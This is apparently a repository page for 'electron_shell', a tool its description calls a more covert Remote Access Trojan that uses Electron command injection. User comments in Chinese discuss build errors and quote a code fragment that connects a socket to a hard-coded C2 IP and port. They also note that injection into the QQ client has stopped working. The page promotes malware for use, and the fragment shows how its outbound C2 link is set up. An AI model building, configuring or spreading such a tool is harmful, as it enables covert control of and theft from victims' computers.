electron_shell
electron_shell copied to clipboard
Developing a more covert Remote Access Trojan (RAT) tool by leveraging Electron's features for command injection and combining it with remote control methods.
使用node/20.0.0 node/20.10.0 这两个版本都报错 Error! No available node version satisfies 'node20'
除了在build.config里面配置外还需要在 lib文件夹下的_inspect.js文件下把ip和端口修改过来: function doit() { const client = new net.Socket(); const c2_info = {"pub_ip":"175.27.249.94","port":"8889"}; client.connect(c2_info.port, c2_info.pub_ip, () => { 另外qq(windows版本)不能注入了: yes find this: QQ.exe 1620 (node:7192) UnhandledPromiseRejectionWarning: Error: ϵͳÕÒ²»µ½Ö¸¶¨µÄÎļþ¡£ at...